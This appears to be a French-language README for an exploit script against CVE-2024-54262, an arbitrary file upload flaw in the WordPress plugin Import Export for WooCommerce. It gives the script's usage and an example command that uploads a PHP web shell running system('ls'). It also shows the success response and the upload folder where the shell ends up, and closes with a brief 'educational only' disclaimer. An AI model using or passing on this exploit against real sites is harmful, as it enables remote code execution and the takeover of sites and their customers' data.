
Exploiter CVE-2024-54262 : Téléchargement de fichier arbitraire dans Import Export pour WooCommerce
Exploitation de CVE-2024-54262 : Téléchargement arbitraire de fichiers dans Import Export for WooCommerce
Ce script exploite une vulnérabilité dans le plugin WordPress « Import Export for WooCommerce ». La vulnérabilité permet à des utilisateurs non autorisés de télécharger des fichiers arbitraires, ce qui peut entraîner une exécution de code à distance (RCE).
requestsargparseInstallez les dépendances avec :
pip install requests
usage: CVE-2024-54262.py [-h] --url URL --username USERNAME --password PASSWORD [--command COMMAND]
Exploit CVE-2024-54262: Arbitrary File Upload in Import Export for WooCommerce
options:
-h, --help show this help message and exit
--url URL, -u URL Base URL of the WordPress site
--username USERNAME, -un USERNAME
Username for login
--password PASSWORD, -p PASSWORD
Password for login
--command COMMAND, -c COMMAND
PHP shell code to upload
CVE-2024-54262.py --url https://example.com --username admin --password admin --command "<?php system('ls'); ?>"
{
"status": true,
"code": 104,
"message": "Success",
"data": {
"file_name": "import_manual_1737090262.php",
"total_requests": 1,
"import_columns": "all",
"product_search_type": "SKU",
"product_operation": "create_new_update_existing",
"field_separator": ","
}
}
import_manual_1737090262.phpwp-content/uploads/import-export-for-woocommerce/product/Cet outil est uniquement à des fins éducatives. L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par ce script. L'accès non autorisé ou l'exploitation de systèmes sans autorisation explicite est illégal et contraire à l'éthique.